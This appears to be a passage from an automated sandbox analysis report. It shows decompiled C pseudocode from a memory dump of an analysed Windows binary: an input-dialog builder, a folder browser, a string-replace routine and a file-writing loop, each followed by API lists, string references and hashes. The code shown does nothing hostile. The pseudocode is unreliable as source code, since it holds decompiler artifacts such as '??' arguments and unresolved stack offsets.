				RegisterClassExW( &_v48);
				 *0x4170c8 = 0;
				 *0x4170d8 = E00409471(_t112);
				E00409528(1);
				_t56 =  *0x4170d8; // 0x0
				if(_t56 == 0 || IsWindowEnabled(_t56) == 0) {
					 *0x4170dc = 0;
				} else {
					EnableWindow( *0x4170d8, 0);
					 *0x4170dc = 1;
				}
				_t57 = E00409471(_t112);
				_t58 = GetSystemMetrics(1);
				asm("cdq");
				_t62 = GetSystemMetrics(0);
				asm("cdq");
				_t111 = CreateWindowExW(0,  *0x416114, _t110, 0x10c80000, (_t62 - _t116 >> 1) - 0x96, (_t58 - _t116 >> 1) - 0x41, 0x12c, 0x82, _t57, 0,  *0x41700c, 0);
				if(_t111 == 0) {
					L20:
					if(_v96 != 0) {
						goto L22;
					}
					goto L21;
				} else {
					SetWindowLongW(_t111, 0xffffffeb,  &_v96);
					_t74 = CreateWindowExW(0, L"STATIC", _a4, 0x5000000b, 0xa, 0xa, 0x118, 0x16, _t111, 0,  *0x41700c, 0);
					 *0x4170d4 = _t74;
					SendMessageW(_t74, 0x30,  *0x4170c4, 1);
					if((_a16 & 0x00000001) != 0) {
						_push(0x20);
						_pop(0);
					}
					_t76 = CreateWindowExW(0x200, L"EDIT", 0, 0x50010080, 0xa, 0x20, 0x113, 0x15, _t111, 0xa,  *0x41700c, 0);
					 *0x4170d0 = _t76;
					SendMessageW(_t76, 0x30,  *0x4170c4, 1);
					SetFocus( *0x4170d0);
					if(_t117 != 0) {
						SendMessageW( *0x4170d0, 0xc, 0, _t117);
						_push(wcslen(_t117));
						_t105 = wcslen(_t117);
						_pop(_t112);
						SendMessageW( *0x4170d0, 0xb1, _t105, ??);
					}
					_t80 = CreateWindowExW(0, L"BUTTON", L"OK", 0x50010001, 0x6e, 0x43, 0x50, 0x19, _t111, 0x3e8,  *0x41700c, 0);
					 *0x4170cc = _t80;
					SendMessageW(_t80, 0x30,  *0x4170c4, 1);
					_t82 = 0xd;
					_v88.key = _t82;
					_v88.cmd = 0x3e8;
					_t84 = 0x1b;
					_v80 = _t84;
					_v78 = 0x3e9;
					_v88.fVirt = 1;
					_v82 = 1;
					_t122 = CreateAcceleratorTableW( &_v88, 2);
					SetForegroundWindow(_t111);
					BringWindowToTop(_t111);
					while( *0x4170c8 == 0) {
						if(GetMessageW( &_v76, 0, 0, 0) == 0) {
							break;
						}
						if(TranslateAcceleratorW(_t111, _t122,  &_v76) == 0) {
							TranslateMessage( &_v76);
							DispatchMessageW( &_v76);
						}
					}
					if(_t122 != 0) {
						DestroyAcceleratorTable(_t122);
					}
					if(_v96 == 0) {
						L21:
						E0040E2A0(_t112, _a20);
						L22:
						E00408E3A(_v92);
						E00408E3A(_a4);
						return E00408E3A(_t117);
					} else {
						wcscpy(E0040E200(wcslen(_v96), _a20), _v104);
						_pop(_t112);
						HeapFree( *0x417008, 0, _v104);
						goto L20;
					}
				}
			}

APIs

Part of subcall function 00408DF8: wcslen.MSVCRT ref: 00408E04
Part of subcall function 00408DF8: HeapAlloc.KERNEL32(00000000,00000000,?,00408F21,?), ref: 00408E1A
Part of subcall function 00408DF8: wcscpy.MSVCRT ref: 00408E2B

GetStockObject.GDI32(00000011), ref: 00408F52
LoadIconW.USER32 ref: 00408F89
LoadCursorW.USER32(00000000,00007F00), ref: 00408F99
RegisterClassExW.USER32 ref: 00408FC1
IsWindowEnabled.USER32(00000000), ref: 00408FE8
EnableWindow.USER32(00000000), ref: 00408FF9
GetSystemMetrics.USER32 ref: 00409031
GetSystemMetrics.USER32 ref: 0040903E
CreateWindowExW.USER32 ref: 0040905F
SetWindowLongW.USER32 ref: 00409073
CreateWindowExW.USER32 ref: 004090A1
SendMessageW.USER32(00000000,00000030,00000001), ref: 004090B9
CreateWindowExW.USER32 ref: 004090F7
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409109
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409111
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409126
wcslen.MSVCRT ref: 00409129
wcslen.MSVCRT ref: 00409131
SendMessageW.USER32(000000B1,00000000,00000000), ref: 00409143
CreateWindowExW.USER32 ref: 0040916D
SendMessageW.USER32(00000000,00000030,00000001), ref: 0040917F
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091B6
SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091BF
BringWindowToTop.USER32(00000000), ref: 004091C6
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004091D9
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 004091EA
TranslateMessage.USER32(?), ref: 004091F9
DispatchMessageW.USER32 ref: 00409204
DestroyAcceleratorTable.USER32 ref: 00409218
wcslen.MSVCRT ref: 00409229
wcscpy.MSVCRT ref: 00409241
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409254

Strings

BUTTON, xrefs: 00409166
D A, xrefs: 00408FA3
STATIC, xrefs: 0040909B
0, xrefs: 00408F65
EDIT, xrefs: 004090ED

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D A$EDIT$STATIC
API String ID: 54849019-3594934238
Opcode ID: 52e87966c6cca03b54c2017619d01c3975366cb43439a8209a5400c07438eea5
Instruction ID: 4016936b5c3c7f784b3cc7a4ee05ecee8f5df5742f345e72c0c18d3b3e823eb4
Opcode Fuzzy Hash: 52e87966c6cca03b54c2017619d01c3975366cb43439a8209a5400c07438eea5
Instruction Fuzzy Hash: 1E917F70648300BFE7219F61DC4AF9B7FA9FB48B44F01893EF644A61E1C7B998408B59

Uniqueness

Uniqueness Score: -1.00%

Function 00401500, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401500(void* __edi, void* __esi, char _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v0;
				char _v4;
				char _v8;
				char* _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				char _v36;
				signed int _v48;
				void* __ebx;
				void* _t65;
				void* _t66;
				void* _t82;
				void* _t88;
				void* _t94;
				void* _t99;
				void* _t100;
				void* _t108;
				void* _t111;
				void* _t120;
				long _t129;
				void* _t130;
				void* _t131;
				void* _t136;
				char* _t142;
				void* _t151;
				void* _t152;
				void* _t157;
				void* _t159;
				void* _t163;
				intOrPtr _t178;
				intOrPtr _t183;
				void* _t186;
				char* _t189;
				void* _t190;
				void* _t191;
				void* _t193;
				void* _t196;
				void* _t199;
				intOrPtr _t200;
				void* _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t205;
				void* _t206;
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t218;
				void* _t221;
				void* _t223;
				void* _t224;
				intOrPtr _t227;
				void* _t231;

				_t224 = __esi;
				_t223 = __edi;
				_t189 = 0xb;
				do {
					_t231 = _t231 - 4;
					_v12 = 0;
					_t189 = _t189 - 1;
				} while (_t189 != 0);
				E0040DF60();
				_t169 =  *0x41708c; // 0x1
				if(_t169 != 1) {
					 *0x41708c = 1;
					_a16 = 1;
					while(1) {
						_t65 = E0040DE20();
						_t190 = _t189;
						_push(_t65);
						_t66 = E0040DE20();
						_t191 = _t190;
						E004057F0(_t169, _t223, _t224,  *0x41701c, _a16, 0x41602a, _t66);
						_push( &_v12);
						E0040DE60();
						_v12 = E00405920(_v20, 0x41602e);
						__eflags = _v12;
						if(_v12 != 0) {
							_t130 = E0040DE20();
							_t213 = _t191;
							_push(_t130);
							_t131 = E0040DE20();
							_t214 = _t213;
							E004057F0(_t169, _t223, _t224, _a4, 2, 0x41602e, _t131);
							_push( &_a8);
							E0040DE60();
							_t136 = E0040DE20();
							_t215 = _t214;
							_push(_t136);
							E004057F0(_t169, _t223, _t224, _v20, 1, 0x41602e, E0040DE20());
							E0040DE60( &_v36, _t215);
						}
						__eflags = 0;
						E00405120(0, _a4);
						if(__eflags != 0) {
							break;
						}
						asm("cdq");
						_t189 = _a16 % 2;
						__eflags = _t189;
						if(__eflags != 0) {
							_t82 = E0040DE20();
							_t193 = _t189;
							_push(_t82);
							_push(_t193);
							_push(E0040DE20());
							E00405AC0(__eflags, _a4, 1);
							E0040E020(2);
							_pop(_t186);
							E00405120(E00405160(_t186), 0x416032);
							if(__eflags == 0) {
								_t88 = E0040DE20();
								_t196 = 0x416032;
								_push(_t88);
								E00405D40(_v0, 0x416032, E0040DE20());
								E0040DE60( &_v12, _t196);
								_push(_v20);
								_t94 = E0040DE20();
								_pop(_t199);
								E0040DFC0(_t199);
								_t52 =  &_a4; // 0x25e403c
								E0040DE60(_t52, _t94);
								_push(E00405980(_v12));
								_t227 =  *0x417090; // 0x25e4038
								__eflags = _t227 + _v48 * 0xc;
								_pop(_t99);
								_v0 = _t99;
								_t200 =  *0x417088; // 0x2870318
								_t100 = E0040DE20();
								_t201 = _t200;
								E0040DFC0(_t201);
								_t202 =  *0x417048; // 0x2768f70
								E0040DFC0(_t202);
								_t203 =  *0x417064; // 0x27605f0
								E0040DFC0(_t203);
								E0040DFC0(_v48);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60(0x417088, _t100);
							} else {
								_t205 =  *0x417048; // 0x2768f70
								_t108 = E0040DE20();
								_t206 = _t205;
								_push(_t108);
								E0040DFC0(_t206);
								_t207 =  *0x417064; // 0x27605f0
								E0040DFC0(_t207);
								_t111 = E0040DE20();
								_t208 = _t207;
								_push(_t111);
								E00405D40(_v8, 0x416032, E0040DE20());
								E0040DE60( &_a4, _t208);
								E0040A665(_v4);
								_t178 =  *0x41707c; // 0x0
								__eflags = _t178 - 1;
								if(_t178 == 1) {
									_push(E00405980(_a20));
									E0040A6E5(_a20);
								}
								_push(_a24);
								E00403C3E();
								_t210 =  *0x417088; // 0x2870318
								_t120 = E0040DE20();
								_t211 = _t210;
								E0040DFC0(_t211);
								E0040DFC0(_a16);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60(0x417088, _t120);
							}
						} else {
							_t129 = E00405980(_a4);
							_a8 = _t129;
							_v12 =  &(_v12[1]);
						}
						_t169 = _a12 + 1;
						_a12 = _a12 + 1;
					}
					_t74 = _v8;
				} else {
					_t183 =  *0x417074; // 0x0
					if(_t183 != 1) {
						L6:
						_t142 = 0;
						__eflags = 0;
					} else {
						_t183 =  *0x417060; // 0x0
						if(_t183 == 1) {
							goto L6;
						} else {
							_t142 = 1;
						}
					}
					_t74 = _t142;
					if(_t142 != 0) {
						_v20 = E00405760( *0x417088, 0x416022);
						_v16 = 1;
						while(_v12 >= _v8) {
							_t151 = E0040DE20();
							_t218 = _t189;
							_push(_t151);
							_t152 = E0040DE20();
							_t189 = _t218;
							_t3 =  &_v8; // 0x416062
							E004057F0(_t183, _t223, _t224,  *0x417088,  *_t3, L"\r\n", _t152);
							_push( &_v20);
							E0040DE60();
							_t157 = E0040249B(_v28);
							_t239 = _t157;
							if(_t157 != 0) {
								_push(_t189);
								_t159 = E0040DE20();
								E00402BFA(_t239, _v4);
								_t7 =  &_v4; // 0x416062
								E0040DE60(_t7, _t159);
								_t8 =  &_v8; // 0x416062
								_push( *_t8);
								_t163 = E0040DE20();
								_pop(_t221);
								E0040DFC0(_t221);
								_t9 =  &_v16; // 0x416062
								E0040DFC0( *_t9);
								_t189 = L"\r\n";
								E0040DFC0(_t189);
								E0040DE60( &_v20, _t163);
							}
							_t11 =  &_v8;
							 *_t11 = _v8 + 1;
							if( *_t11 >= 0) {
								continue;
							}
							break;
						}
						_a4 = E00405700(_a4);
						WriteFile( *0x417034, _v0, E00409B00(_a4),  &_a8, 0);
						E00409B20(_v0);
						_t74 = E00405068(0x417088, 0x416020);
					}
				}
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t74, _v4), _a24), _v4), _a12), _v16);
			}

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00405853
Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 00405920: wcsstr.MSVCRT ref: 00405961

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040DEBC

Part of subcall function 0040A665: wcsncpy.MSVCRT ref: 0040A683
Part of subcall function 0040A665: wcslen.MSVCRT ref: 0040A695
Part of subcall function 0040A665: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A6D5

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Strings

.`A, xrefs: 004016C5
b`A, xrefs: 004018F7
.`A, xrefs: 0040169B
`A, xrefs: 00401645
b`A, xrefs: 00401835
b`A, xrefs: 004015ED
2`A, xrefs: 00401861
2`A, xrefs: 00401784
"`A, xrefs: 0040154F
.`A, xrefs: 004016F3
b`A, xrefs: 00401590, 004015C7, 004015D1, 004015E3, 004015CB, 004015D5, 004015DD, 004015E7
b`A, xrefs: 0040158A
*`A, xrefs: 0040167C
2`A, xrefs: 004017CD

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmpwcsstr
String ID: `A$"`A$*`A$.`A$.`A$.`A$2`A$2`A$2`A$b`A$b`A$b`A$b`A$b`A
API String ID: 4088865958-588743708
Opcode ID: 6dbfea62690b127eaf24f4378f446ed451afde7462f6d2ec7042ae71204f504e
Instruction ID: ee34c1dc759ec8b9afbcc9474be159e29596370e2cc13c49719891b07a5b0ef3
Opcode Fuzzy Hash: 6dbfea62690b127eaf24f4378f446ed451afde7462f6d2ec7042ae71204f504e
Instruction Fuzzy Hash: 53B13FB5504701AED600FBA1DD8197F76A9EB98708F10C83FB044BA1E2CA3CDD599B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004092F5, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004092F5(void* __esi, intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
				short _v2;
				long _v520;
				wchar_t* _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				void _v552;
				_Unknown_base(*)()* _v556;
				_Unknown_base(*)()* _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				short* _t39;
				_Unknown_base(*)()* _t42;
				signed int _t47;
				wchar_t* _t56;
				int _t59;
				short _t60;
				wchar_t* _t65;
				int _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t70;
				wchar_t* _t72;
				struct HINSTANCE__* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t68 = __esi;
				_t74 =  &_v560;
				_t66 = 0;
				_t77 =  *0x4170e0 - _t66; // 0x0
				if(_t77 == 0) {
					 *0x4170e0 = 1;
					__imp__CoInitialize(0);
				}
				memset( &_v552, _t66, 0x20);
				_t75 = _t74 + 0xc;
				_t73 = LoadLibraryW(L"SHELL32.DLL");
				if(_t73 == 0) {
					L12:
					_t39 = E0040E200(0x104, _a12);
					_t64 = 0;
					 *_t39 = 0;
					goto L13;
				} else {
					_push(_t68);
					_v560 = GetProcAddress(_t73, "SHBrowseForFolderW");
					_t42 = GetProcAddress(_t73, "SHGetPathFromIDListW");
					_t65 = _a8;
					_v556 = _t42;
					if(_t65 == 0) {
						_t65 = 0x412024;
					}
					wcsncpy( &_v520, _t65, 0x103);
					_v2 = 0;
					_t47 = wcslen( &_v520);
					_t76 = _t75 + 0x10;
					_t64 = 0x5c;
					if(_t47 > 3 &&  *((intOrPtr*)(_t76 + 0x36 + _t47 * 2)) == _t64) {
						_t64 = 0;
						 *((short*)(_t76 + 0x36 + _t47 * 2)) = 0;
					}
					_v540 = _a4;
					_v552 = E00409471(_t64);
					_v536 = 0x50;
					_v532 = E004092B1;
					_v528 =  &_v520;
					E00409528(1);
					_t70 = _v564( &_v556);
					_v568 = _t70;
					E00409528(_t66);
					if(_t70 != 0) {
						_t56 = E0040E200(0x104, _a8);
						_t67 = _v572;
						_t72 = _t56;
						 *_t72 = 0;
						_v568(_t67, _t72);
						__imp__CoTaskMemFree();
						_t59 = wcslen(_t72);
						_t64 = _t67;
						_t66 = _t59;
						_t60 = 0x5c;
						if( *((intOrPtr*)(_t72 + _t66 * 2 - 2)) != _t60) {
							 *((short*)(_t72 + _t66 * 2)) = _t60;
							 *((short*)(_t72 + 2 + _t66 * 2)) = 0;
							_t66 = _t66 + 1;
						}
					}
					FreeLibrary(_t73);
					if(_t66 != 0) {
						L13:
						return E0040E350(_t64, 0x104 - _t66);
					} else {
						goto L12;
					}
				}
			}

APIs

CoInitialize.OLE32(00000000), ref: 00409313

Part of subcall function 0040E350: TlsGetValue.KERNEL32(0000001B,\\?\,?,0040968D,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E35A

memset.MSVCRT ref: 00409321
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
wcsncpy.MSVCRT ref: 0040937D
wcslen.MSVCRT ref: 00409391
CoTaskMemFree.OLE32(?), ref: 0040941A
wcslen.MSVCRT ref: 00409421
FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440

Strings

SHGetPathFromIDListW, xrefs: 00409352
SHELL32.DLL, xrefs: 00409329
$ A, xrefs: 0040936D
P, xrefs: 004093C9
SHBrowseForFolderW, xrefs: 0040934A

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $ A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-128120239
Opcode ID: d5588915c1d38e9502f5e4006468ea80d97d5df85f2ef6855433996e1c219f47
Instruction ID: 1392e4e60208b56ee8b10dacf4ca704cd47aacd570b2ed0dd50540f2d7556013
Opcode Fuzzy Hash: d5588915c1d38e9502f5e4006468ea80d97d5df85f2ef6855433996e1c219f47
Instruction Fuzzy Hash: 81418571504300AAC720EF759C49A9FBBE8EF88744F00483FF945E3292D779D9458B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004062B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004062B0() {
				signed int _t88;
				long _t89;
				signed int _t91;
				void* _t92;
				wchar_t* _t93;
				void* _t94;
				signed short* _t98;
				void _t99;
				int _t101;
				void* _t103;
				signed int _t105;
				wchar_t* _t106;
				void* _t107;
				wchar_t* _t109;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				signed int _t116;
				wchar_t* _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed short* _t122;
				void* _t123;
				signed int _t126;
				void* _t127;
				signed char _t128;
				void* _t131;
				signed int _t132;
				long* _t134;
				void* _t135;
				wchar_t* _t141;
				void* _t142;
				signed short* _t143;
				wchar_t* _t146;
				wchar_t* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				_t150 = 0;
				if( *(_t151 + 0x34) == 0) {
					 *(_t151 + 0x34) = 0x412024;
				}
				_t117 =  *(_t151 + 0x38);
				if(_t117 == 0) {
					_t117 = 0x412024;
					 *(_t151 + 0x38) = 0x412024;
				}
				if( *(_t151 + 0x3c) == _t150) {
					 *(_t151 + 0x3c) = 0x412024;
				}
				_t128 =  *(_t151 + 0x40);
				_t120 = 0x40530d;
				_t88 = _t128 & 0x00000001;
				 *(_t151 + 0x14) = _t88;
				if(_t88 == 0) {
					_t120 = L004052F5;
				}
				 *(_t151 + 0x40) = _t120;
				if( *(_t151 + 0x44) <= _t150) {
					 *(_t151 + 0x44) = 1;
				}
				_t147 = _t117;
				_t134 =  &(_t147[0]);
				do {
					_t89 =  *_t147;
					_t147 =  &(_t147[0]);
				} while (_t89 != 0);
				_t135 =  *(_t151 + 0x3c);
				_t149 = _t147 - _t134 >> 1;
				 *(_t151 + 0x10) = _t135 + 2;
				do {
					_t91 =  *_t135;
					_t135 = _t135 + 2;
				} while (_t91 != 0);
				_t137 = _t135 -  *(_t151 + 0x10) >> 1;
				 *(_t151 + 0x10) = _t135 -  *(_t151 + 0x10) >> 1;
				if((_t128 & 0x00000002) == 0) {
					_t92 = E0040E180(_t120,  *(_t151 + 0x34));
					 *(_t151 + 0x24) = _t92;
					if(_t92 != 0) {
						_push( *(_t151 + 0x34));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x34) = _t92;
					}
					_t93 = E0040E180(_t120, _t117);
					 *(_t151 + 0x28) = _t93;
					if(_t93 != 0) {
						_push(_t117);
						L00405313();
						_t117 = _t93;
						_t151 = _t151 + 4;
						 *(_t151 + 0x38) = _t117;
					}
					_t94 = E0040E180(_t120,  *(_t151 + 0x3c));
					 *(_t151 + 0x2c) = _t94;
					if(_t94 != 0) {
						_push( *(_t151 + 0x3c));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x3c) = _t94;
					}
					_t121 =  *(_t151 + 0x44) +  *(_t151 + 0x44);
					 *(_t151 + 0x1c) = _t121;
					_t98 =  *(_t151 + 0x34) + 0xfffffffe + _t121;
					 *(_t151 + 0x20) = _t98;
					_t122 = _t98;
					 *(_t151 + 0x18) = _t122;
					if( *(_t151 + 0x48) != 0) {
						_t111 =  *_t122 & 0x0000ffff;
						if(_t111 != 0) {
							_t143 = _t122;
							do {
								if( *(_t151 + 0x14) != 0) {
									_t112 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
									_t151 = _t151 + 0xc;
									if(_t112 != 0) {
										goto L38;
									} else {
										goto L48;
									}
									goto L61;
								} else {
									if(_t111 !=  *_t117) {
										L38:
										_t143 =  &(_t143[1]);
										goto L39;
									} else {
										_t113 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
										_t151 = _t151 + 0xc;
										if(_t113 == 0) {
											L48:
											_t132 =  *(_t151 + 0x48);
											_t143 =  &(_t143[_t149]);
											_t150 = _t150 + 1;
											if(_t132 == 0xffffffff) {
												goto L39;
											} else {
												if(_t132 <= _t150) {
													break;
												} else {
													goto L39;
												}
											}
											L61:
											if( *(_t151 + 0x24) != 0) {
												free(_t118);
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x28) != 0) {
												free( *(_t151 + 0x38));
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x2c) != 0) {
												free( *(_t151 + 0x3c));
												return _t91;
											}
											goto L67;
										} else {
											goto L38;
										}
									}
								}
								break;
								L39:
								_t111 =  *_t143 & 0x0000ffff;
							} while (_t111 != 0);
							_t137 =  *(_t151 + 0x10);
						}
					}
					_t118 =  *(_t151 + 0x34);
					_t123 = _t118;
					_t131 = _t123 + 2;
					do {
						_t99 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t99 != 0);
					_t141 = E0040E200((_t137 - _t149) * _t150 + (_t123 - _t131 >> 1),  *((intOrPtr*)(_t151 + 0x4c)));
					if(_t150 != 0) {
						_t101 =  *(_t151 + 0x44);
						if(_t101 > 1) {
							wcsncpy(_t141,  *(_t151 + 0x38), _t101);
							_t109 =  *(_t151 + 0x28);
							_t151 = _t151 + 0xc;
							_t118 =  *(_t151 + 0x20);
							_t141 = _t141 +  &(_t109[0]);
						}
						_t126 =  *_t118 & 0x0000ffff;
						while(_t126 != 0) {
							if(_t150 <= 0) {
								L58:
								 *_t141 =  *_t118;
								_t141 =  &(_t141[0]);
								_t118 = _t118 + 2;
							} else {
								if( *(_t151 + 0x14) != 0) {
									_t103 =  *((intOrPtr*)(_t151 + 0x4c))(_t118,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t103 != 0) {
										goto L58;
									} else {
										goto L69;
									}
									goto L70;
								} else {
									_t106 =  *(_t151 + 0x38);
									if(_t126 !=  *_t106) {
										goto L58;
									} else {
										_t107 =  *((intOrPtr*)(_t151 + 0x4c))(_t118, _t106, _t149);
										_t151 = _t151 + 0xc;
										if(_t107 == 0) {
											L69:
											wcsncpy(_t141,  *(_t151 + 0x40),  *(_t151 + 0x10));
											_t105 =  *(_t151 + 0x1c);
											_t118 = _t118 + _t149 * 2;
											_t151 = _t151 + 0xc;
											_t150 = _t150 - 1;
											_t141 = _t141 + _t105 * 2;
										} else {
											goto L58;
										}
									}
								}
							}
							_t126 =  *_t118 & 0x0000ffff;
						}
						_t118 =  *(_t151 + 0x34);
						_t91 = 0;
						 *_t141 = 0;
					} else {
						_t127 = _t118;
						_t142 = _t141 - _t118;
						do {
							_t91 =  *_t127 & 0x0000ffff;
							_t127 = _t127 + 2;
							 *(_t142 + _t127 - 2) = _t91;
						} while (_t91 != 0);
					}
					goto L61;
				} else {
					if(_t149 == 0) {
						L67:
						return _t91;
					} else {
						_t91 =  *(_t151 + 0x48);
						if(_t91 != 0) {
							_t146 =  *(_t151 + 0x34) + ( *(_t151 + 0x44) - 1) * 2;
							_t119 = _t146;
							if( *_t119 != _t150) {
								while(_t91 == 0xffffffff || _t91 > _t150) {
									_t114 =  *_t120(_t146,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t114 != 0) {
										_t146 =  &(_t146[0]);
										_t119 =  &(_t119[0]);
									} else {
										wcsncpy(_t146,  *(_t151 + 0x40),  *(_t151 + 0x10));
										_t116 =  *(_t151 + 0x1c);
										_t119 = _t119 + _t149 * 2;
										_t151 = _t151 + 0xc;
										_t150 = _t150 + 1;
										_t146 = _t146 + _t116 * 2;
									}
									_t91 =  *(_t151 + 0x48);
									_t120 =  *(_t151 + 0x40);
									if( *_t119 != 0) {
										continue;
									} else {
										return _t91;
									}
									goto L70;
								}
							}
						}
						goto L67;
					}
				}
				L70:
			}

APIs

wcsncpy.MSVCRT ref: 004063A5

Part of subcall function 0040E180: TlsGetValue.KERNEL32(0000001B,?,?,00405E65,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E18A

_wcsdup.MSVCRT ref: 004063EE
_wcsdup.MSVCRT ref: 00406409
_wcsdup.MSVCRT ref: 0040642C
wcsncpy.MSVCRT ref: 00406518
free.MSVCRT(?), ref: 0040657C
free.MSVCRT(?), ref: 0040658F
free.MSVCRT(?), ref: 004065A2
wcsncpy.MSVCRT ref: 004065CE

Strings

$ A, xrefs: 004062BF
$ A, xrefs: 004062DE
$ A, xrefs: 004062CF

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $ A$$ A$$ A
API String ID: 1554701960-2077024048
Opcode ID: 81cbbaf9a2bb25f669f5b054791e3fa14d7c6e9058cb5600c4bd8963ee11386a
Instruction ID: ef8ff848e519ff80595976f88fda9aa54c27a9e0628953f57c1371388918df2b
